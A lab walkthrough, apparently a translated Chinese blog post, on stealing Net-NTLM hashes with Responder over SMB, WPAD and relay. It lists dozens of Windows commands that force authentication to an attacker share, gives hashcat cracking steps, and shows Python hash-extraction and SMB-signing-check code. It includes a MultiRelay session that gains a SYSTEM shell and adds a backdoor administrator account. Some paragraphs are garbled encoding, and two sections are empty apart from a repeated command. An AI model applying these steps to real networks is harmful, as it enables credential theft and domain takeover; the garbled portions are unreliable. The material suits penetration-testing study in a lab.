Original link: http://wyb0.com/posts/responder-and-ntml-hash/
0x00 Some concepts
Windows authentication protocols
Two families: NTLM-based authentication and Kerberos-based authentication.
What is an NTLM hash?
The early LM hash algorithm (from the IBM/Microsoft LAN Manager era) had serious weaknesses. Microsoft kept backward compatibility but introduced its own hash, the NT hash (MD4 over the UTF-16LE encoded password, no salt; commonly called the NTLM hash), together with the NTLM challenge/response protocol that uses this hash as its key.
什么是Challenge-Response挑戰(zhàn)/響應(yīng)驗(yàn)證機(jī)制晒骇?
- Client輸入username霞怀、password与倡、domain距帅,然后將用戶名及密碼hash后存在本地抖仅,并將username發(fā)送到 DC
- DC生成一個(gè)16字節(jié)的隨機(jī)數(shù)交煞,即Challenge(挑戰(zhàn)碼)咏窿,然后傳回Client
- Client收到Challenge后將密碼hash和challenge混合hash,混合后的hash稱為response素征,然后將challenge集嵌、response和username發(fā)送給Server
- Server將收到的3個(gè)值轉(zhuǎn)發(fā)給DC,然后DC根據(jù)傳過來的username到域控的賬號數(shù)據(jù)庫ntds.list找到對應(yīng)的密碼hash御毅,將hash和Client傳過來的challenge混合hash根欧,將這個(gè)混合hash與Client傳過來的response進(jìn)行對比驗(yàn)證
-
NTLM hash vs. Net-NTLM hash
- NTLM hash usually means the password hash stored in the Security Account Manager on Windows. All user hashes can be dumped from the SAM file on a workstation or from NTDS.dit on a domain controller (for example with Mimikatz). The "password hash" used as the key in the challenge/response exchange above is this NTLM (NT) hash, and it can be used directly in pass-the-hash.
- Net-NTLM hash usually means the challenge/response value that crosses the network during NTLM authentication; the response in the exchange above contains it. What Responder captures is a Net-NTLM hash (Net-NTLMv1 or Net-NTLMv2). It cannot be used for pass-the-hash: it is either cracked offline to recover the password, or relayed while the authentication is still in flight.
關(guān)于Responder
由Laurent Gaffie撰寫的 Responder 是迄今為止柔袁,在每個(gè)滲透測試人員用于竊取不同形式的證書(包括Net-NTLM hash)的最受歡迎的工具。它通過設(shè)置幾個(gè)模擬的惡意守護(hù)進(jìn)程(如SQL服務(wù)器异逐,F(xiàn)TP捶索,HTTP和SMB服務(wù)器等)來直接提示憑據(jù)或模擬質(zhì)詢 – 響應(yīng)驗(yàn)證過程并捕獲客戶端發(fā)送的必要 hash。Responder也有能力攻擊LLMNR灰瞻,NBT-NS和mDNS等協(xié)議腥例。什么是NTLM中繼攻擊?
攻擊者可以直接通過LM Hash和NTLM Hash訪問遠(yuǎn)程主機(jī)或服務(wù)酝润,而不用提供明文密碼燎竖。
0x01 Environment
- Responder can be downloaded from https://github.com/lgandx/Responder
- Domain member host: Win7 (10.11.11.20)
- Domain controller: Win2008 (10.11.11.18)
- Attacker-controlled host: Ubuntu 14.04 (10.11.11.11), on the same subnet as the targets
0x02 Capturing a Net-NTLM hash through SMB
When a Windows SMB client connects to a server, it authenticates automatically with the logged-on user's credentials (NTLM challenge/response keyed with the user's NT hash) before any prompt appears, so a rogue SMB server can capture the Net-NTLM hash. Any of the following commands, pointed at a UNC path on the attacker's host, will trigger that authentication (the list comes from the gist in the references; the comments are that author's notes):
net.exe use \\host\share
attrib.exe \\host\share
bcdboot.exe \\host\share
bdeunlock.exe \\host\share
cacls.exe \\host\share
certreq.exe \\host\share #(noisy, pops an error dialog)
certutil.exe \\host\share
cipher.exe \\host\share
ClipUp.exe -l \\host\share
cmdl32.exe \\host\share
cmstp.exe /s \\host\share
colorcpl.exe \\host\share #(noisy, pops an error dialog)
comp.exe /N=0 \\host\share \\host\share
compact.exe \\host\share
control.exe \\host\share
convertvhd.exe -source \\host\share -destination \\host\share
Defrag.exe \\host\share
DeployUtil.exe /install \\host\share
DevToolsLauncher.exe GetFileListing \\host\share #(this one's cool. will return a file listing (json-formatted) from remote SMB share...)
diskperf.exe \\host\share
dispdiag.exe -out \\host\share
doskey.exe /MACROFILE=\\host\share
esentutl.exe /k \\host\share
expand.exe \\host\share
extrac32.exe \\host\share
FileHistory.exe \\host\share #(noisy, pops a gui)
findstr.exe * \\host\share
fontview.exe \\host\share #(noisy, pops an error dialog)
fvenotify.exe \\host\share #(noisy, pops an access denied error)
FXSCOVER.exe \\host\share #(noisy, pops GUI)
hwrcomp.exe -check \\host\share
hwrreg.exe \\host\share
icacls.exe \\host\share
LaunchWinApp.exe \\host\share #(noisy, will pop an explorer window with the contents of your SMB share.)
licensingdiag.exe -cab \\host\share
lodctr.exe \\host\share
lpksetup.exe /p \\host\share /s
makecab.exe \\host\share
MdmDiagnosticsTool.exe -out \\host\share #(sends hash, and as a *bonus!* writes an MDMDiagReport.html to the attacker share with full CSP configuration.)
mshta.exe \\host\share #(noisy, pops an HTA window)
msiexec.exe /update \\host\share /quiet
msinfo32.exe \\host\share #(noisy, pops a "cannot open" dialog)
mspaint.exe \\host\share #(noisy, invalid path to png error)
mspaint.exe \\host\share\share.png #(will capture hash, and display the remote PNG file to the user)
msra.exe /openfile \\host\share #(noisy, error)
mstsc.exe \\host\share #(noisy, error)
netcfg.exe -l \\host\share -c p -i foo
On the attacker host run: $ sudo python Responder.py -I eth0 -v
0x03 Capturing a Net-NTLM hash through file inclusion
On the attacker host run: $ sudo python Responder.py -I eth0 -v
0x04 Capturing a Net-NTLM hash through XSS
On the attacker host run: $ sudo python Responder.py -I eth0 -v
0x05 Capturing a Net-NTLM hash with a WPAD proxy server
WPAD (Web Proxy Auto-Discovery) is used by Windows to configure Internet Explorer's proxy automatically; the feature has been on by default since Windows 2000. The client looks for a host named wpad (via DNS, then LLMNR/NBT-NS, which Responder poisons) and fetches http://wpad/wpad.dat from whoever answers.
With WPAD capture enabled in Responder, the Net-NTLM hash is captured as soon as the victim opens a web page.
The -F (--ForceWpadAuth) option makes Responder demand NTLM (or Basic) authentication when the client retrieves wpad.dat; because the fetch also happens at logon, the hash is captured again after the host reboots. Caveat: -F can cause a visible login prompt on the victim, and -w (--wpad) is the option that starts the rogue proxy itself.
On the attacker host run: $ sudo python Responder.py -I eth0 -v -F
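What the rogue HTTP/WPAD server sees once the 401 challenge is answered, as an added example (not code from the original post or from Responder): it builds a constructed NTLM AUTHENTICATE (Type 3) message, shows the HTTP round trips around it, and parses the message into the fields Responder writes to its log. The same NTLMSSP blob travels inside SPNEGO on the SMB path in 0x02, so the parser applies there too. The user, domain, workstation, server challenge and NtChallengeResponse bytes are all made up (the response is a placeholder, not a real HMAC), as is the assumption that the OEM code page is cp437 when Unicode is not negotiated.

```python
import base64
import struct

NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
NTLMSSP_NEGOTIATE_VERSION = 0x02000000
# Constructed: the 8-byte challenge the rogue server placed in its Type 2 (CHALLENGE) message
SERVER_CHALLENGE = bytes.fromhex("f34fb4118e70e824")


def build_type3(user, domain, workstation, nt_response,
                flags=NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_NEGOTIATE_VERSION):
    """Constructed AUTHENTICATE_MESSAGE (MS-NLMP 2.2.1.3): 88-byte fixed part, then payload."""
    header_len = 88                      # with Version (8) and MIC (16)
    lm_response = b"\x00" * 24           # NTLMv2 clients send a dummy LM response
    descriptors, payload = b"", b""
    for value in (lm_response, nt_response, domain.encode("utf-16-le"),
                  user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""):
        descriptors += struct.pack("<HHI", len(value), len(value), header_len + len(payload))
        payload += value
    version = bytes([6, 1, 0, 0, 0, 0, 0, 0x0F])   # Windows 6.1, NTLMSSP revision 15
    return (b"NTLMSSP\x00" + struct.pack("<I", 3) + descriptors
            + struct.pack("<I", flags) + version + b"\x00" * 16 + payload)


def parse_type3(msg: bytes) -> dict:
    """Resolve each (Len, MaxLen, Offset) descriptor; offsets are relative to the message start."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLM Type 3 message")
    out = {}
    for i, name in enumerate(("lm_response", "nt_response", "domain", "user", "workstation", "session_key")):
        length, _max, offset = struct.unpack_from("<HHI", msg, 12 + 8 * i)
        if offset + length > len(msg):
            raise ValueError(f"{name} descriptor points outside the message")
        out[name] = msg[offset:offset + length]
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "cp437"  # OEM code page assumed cp437
    for name in ("domain", "user", "workstation"):
        out[name] = out[name].decode(enc)
    out["version"] = "NTLMv2" if len(out["nt_response"]) > 24 else "NTLMv1"
    return out


def hashcat_line(info: dict, server_challenge: bytes) -> str:
    """Responder's output format: -m 5600 for NTLMv2 (user::domain:challenge:NTProofStr:blob),
    -m 5500 for NTLMv1 (user::domain:LMresponse:NTresponse:challenge)."""
    u, d, nt = info["user"], info["domain"], info["nt_response"]
    if info["version"] == "NTLMv2":
        return f"{u}::{d}:{server_challenge.hex()}:{nt[:16].hex()}:{nt[16:].hex()}"
    return f"{u}::{d}:{info['lm_response'].hex()}:{nt.hex()}:{server_challenge.hex()}"


def extract_from_authorization(header_value: str, server_challenge: bytes):
    """'Authorization: NTLM <base64>' -> hashcat line; None for non-NTLM, Type 1 or malformed input."""
    scheme, _, b64 = header_value.partition(" ")
    if scheme.upper() != "NTLM":
        return None
    try:
        msg = base64.b64decode(b64)
        if len(msg) < 12 or struct.unpack_from("<I", msg, 8)[0] != 3:
            return None
        return hashcat_line(parse_type3(msg), server_challenge)
    except (ValueError, struct.error):
        return None


# Constructed sample: placeholder NTProofStr (16 bytes) + blob, not a real HMAC
PLACEHOLDER_NT_RESPONSE = bytes.fromhex("aa" * 16) + bytes.fromhex("0101000000000000") + bytes(32)
SAMPLE_TYPE3 = build_type3("Administrator", "REBER", "WIN-7", PLACEHOLDER_NT_RESPONSE)
SAMPLE_V1_TYPE3 = build_type3("u", "D", "W", bytes(24))       # 24-byte NT response => NTLMv1
AUTH_HEADER = "NTLM " + base64.b64encode(SAMPLE_TYPE3).decode()
TRUNCATED_HEADER = "NTLM " + base64.b64encode(SAMPLE_TYPE3[:70]).decode()
# The HTTP round trips a WPAD victim has with the rogue server (constructed):
EXCHANGE = [
    "C: GET /wpad.dat HTTP/1.1 / Host: wpad",
    "S: HTTP/1.1 401 Unauthorized / WWW-Authenticate: NTLM",
    "C: Authorization: NTLM <Type 1, NEGOTIATE>",
    "S: HTTP/1.1 401 Unauthorized / WWW-Authenticate: NTLM <Type 2, carries SERVER_CHALLENGE>",
    "C: Authorization: " + AUTH_HEADER,
]

if __name__ == "__main__":
    for line in EXCHANGE:
        print(line[:90])
    print(extract_from_authorization(AUTH_HEADER, SERVER_CHALLENGE))
```

The server never needs to validate the response: it only has to remember which challenge it sent, and the captured line can go straight to hashcat. A real capture checks the descriptors against the message length exactly as parse_type3 does, because a client-controlled offset is the classic way to crash a naive parser.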
0x06 Cracking with hashcat
- Install hashcat (see the hashcat reference at the end)
$ git clone https://github.com/hashcat/hashcat.git
$ mkdir -p hashcat/deps
$ git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL
$ cd hashcat
$ make
$ ./example0.sh
$ ./hashcat
- Brute-force the password with hashcat
-m selects the hash type; 5600 is NetNTLMv2, the format Responder writes out (user::domain:challenge:NTProofStr:blob), so the run is hashcat -m 5600 <captured hash file> <wordlist>. Use 5500 for NetNTLMv1.
The recovered password is 123456
0x07 Adding a user through an NTLM relay attack
This step uses the NTLM relay attack, which is essentially a man-in-the-middle attack: the attacker captures the authentication of a high-privilege account and forwards it to a lower-privilege host where that account has admin rights, then executes commands there. The relayed session is only accepted if the target does not require SMB signing, which is why MultiRelay prints the target's signing state before relaying.
Here the domain controller's Administrator authentication is captured and relayed to the domain member host, and commands are run there to collect information about it.
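The check behind MultiRelay's "SMB signing: False" line, as an added example (not code from the original post or from Responder/MultiRelay). An SMB2 NEGOTIATE Response header and body are constructed in-process (no network I/O); the parser reads the SecurityMode field and reports whether the target would accept an unsigned relayed session. The two sample replies model the page's hosts: a workstation that enables signing without requiring it, and a domain controller that requires it, matching the signing:'True' MultiRelay reports for 10.11.11.18 below. The SPNEGO token bytes and server GUID are placeholders.

```python
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002
DIALECTS = {0x0202: "SMB 2.0.2", 0x0210: "SMB 2.1", 0x0300: "SMB 3.0", 0x0302: "SMB 3.0.2", 0x0311: "SMB 3.1.1"}


def build_negotiate_response(security_mode: int, dialect: int = 0x0210) -> bytes:
    """Constructed SMB2 NEGOTIATE Response (MS-SMB2 2.2.4): 64-byte header + 64-byte body + token."""
    header = SMB2_MAGIC + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, SMB2_NEGOTIATE, 1,
                                      SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0) + b"\x00" * 16
    token = b"\x60\x06\x06\x04\x2b\x06\x01\x05"   # placeholder for the SPNEGO security buffer
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0, b"\x11" * 16,
                       0x7, 0x800000, 0x800000, 0x800000, 0, 0, 128, len(token), 0) + token
    return header + body


def parse_negotiate_response(pkt: bytes) -> dict:
    """Read SecurityMode and DialectRevision from an SMB2 NEGOTIATE Response."""
    if pkt[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 packet (an SMB1 \\xffSMB reply needs the SMB1 parser)")
    size, _, status, command, _, flags = struct.unpack_from("<HHIHHI", pkt, 4)
    if size != 64 or command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    if status != 0:
        raise ValueError(f"NEGOTIATE failed, NTSTATUS 0x{status:08x}")
    body_size, security_mode, dialect = struct.unpack_from("<HHH", pkt, 64)
    if body_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    return {"dialect": DIALECTS.get(dialect, f"0x{dialect:04x}"),
            "signing_enabled": bool(security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED),
            "signing_required": bool(security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED)}


def relay_candidate(pkt: bytes) -> bool:
    """True when an unsigned relayed session would be accepted (MultiRelay's 'SMB signing: False')."""
    return not parse_negotiate_response(pkt)["signing_required"]


# Constructed replies: a workstation (signing enabled, not required) and a DC (signing required)
WORKSTATION_REPLY = build_negotiate_response(SMB2_NEGOTIATE_SIGNING_ENABLED)
DC_REPLY = build_negotiate_response(SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED)

if __name__ == "__main__":
    for name, pkt in (("10.11.11.20 (workstation)", WORKSTATION_REPLY), ("10.11.11.18 (DC)", DC_REPLY)):
        info = parse_negotiate_response(pkt)
        print(f"{name}: {info['dialect']}, signing required: {info['signing_required']}, "
              f"relayable: {relay_candidate(pkt)}")
```

Against a live host the same parser is fed the reply to an SMB2 NEGOTIATE request sent over TCP/445. Domain controllers require signing by default, member workstations and most servers do not, which is exactly the asymmetry this section exploits: the DC's credentials are relayed to the workstation, not the other way round. Enabling "Digitally sign communications (always)" on the member hosts is the fix.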
- Edit Responder.conf so that SMB and HTTP are not started (MultiRelay listens on those ports itself), then start Responder
reber@ubuntu:~/Responder$ head -n 14 Responder.conf
[Responder Core]
; Servers to start
SQL = On
SMB = Off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = Off
DNS = On
LDAP = On
# -F is used here: as soon as a high-privilege user opens a web page in the browser, the hash is captured
reber@ubuntu:~/Responder$ sudo python Responder.py -I eth0 -v -F
- Use Responder's MultiRelay module to get a shell
reber@ubuntu:~/Responder/tools$ sudo python MultiRelay.py -t 10.11.11.20 -u ALL
Responder MultiRelay 2.0 NTLMv1/2 Relay
Send bugs/hugs/comments to: laurent.gaffie@gmail.com
Usernames to relay (-u) are case sensitive.
To kill this script hit CTRL-C.
/*
Use this script in combination with Responder.py for best results.
Make sure to set SMB and HTTP to OFF in Responder.conf.
This tool listen on TCP port 80, 3128 and 445.
For optimal pwnage, launch Responder only with these 2 options:
-rv
Avoid running a command that will likely prompt for information like net use, etc.
If you do so, use taskkill (as system) to kill the process.
*/
Relaying credentials for these users:
['ALL']
Retrieving information for 10.11.11.20...
SMB signing: False
Os version: 'Windows 7 Professional 7600'
Hostname: 'WIN-7'
Part of the 'REBER' domain
[+] Setting up HTTP relay with SMB challenge: f34fb4118e70e824
[+] Received NTLMv2 hash from: 10.11.11.18
[+] Client info: ['Windows Server 2008 R2 Enterprise 7600', domain: 'REBER', signing:'True']
[+] Username: Administrator is whitelisted, forwarding credentials.
[+] SMB Session Auth sent.
[+] Looks good, Administrator has admin rights on C$.
[+] Authenticated.
[+] Dropping into Responder's interactive shell, type "exit" to terminate
Available commands:
dump -> Extract the SAM database and print hashes.
regdump KEY -> Dump an HKLM registry key (eg: regdump SYSTEM)
read Path_To_File -> Read a file (eg: read /windows/win.ini)
get Path_To_File -> Download a file (eg: get users/administrator/desktop/password.txt)
delete Path_To_File-> Delete a file (eg: delete /windows/temp/executable.exe)
upload Path_To_File-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \windows\temp\
runas Command -> Run a command as the currently logged in user. (eg: runas whoami)
scan /24 -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to
pivot IP address -> Connect to another host (eg: pivot 10.0.0.12)
mimi command -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)
mimi32 command -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)
lcmd command -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)
help -> Print this message.
exit -> Exit this shell and return in relay mode.
If you want to quit type exit and then use CTRL-C
Any other command than that will be run as SYSTEM on the target.
Connected to 10.11.11.20 as LocalSystem.
C:\Windows\system32\:#net user test 123456 /add && net localgroup administrators test /add
The command completed successfully.
C:\Windows\system32\:#net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest reber
test
The command completed successfully.
C:\Windows\system32\:#exit
[+] Returning in relay mode.
Exiting...
reber@ubuntu:~/Responder/tools$
References:
- https://apt404.github.io/2016/08/11/ntlm-kerberos
- http://www.4hou.com/system/9383.html
- https://3gstudent.github.io/Windows下的密碼NTLM-hash和Net-NTLM-hash介紹
- https://gist.github.com/anonymous/70f792d50078f0ee795d39d0aa0da46e
- https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes
- https://medium.com/@canavaroxum/xxe-on-windows-system-then-what-76d571d66745
- https://www.anquanke.com/post/id/85004
- https://www.phillips321.co.uk/2016/07/09/hashcat-on-os-x-getting-it-going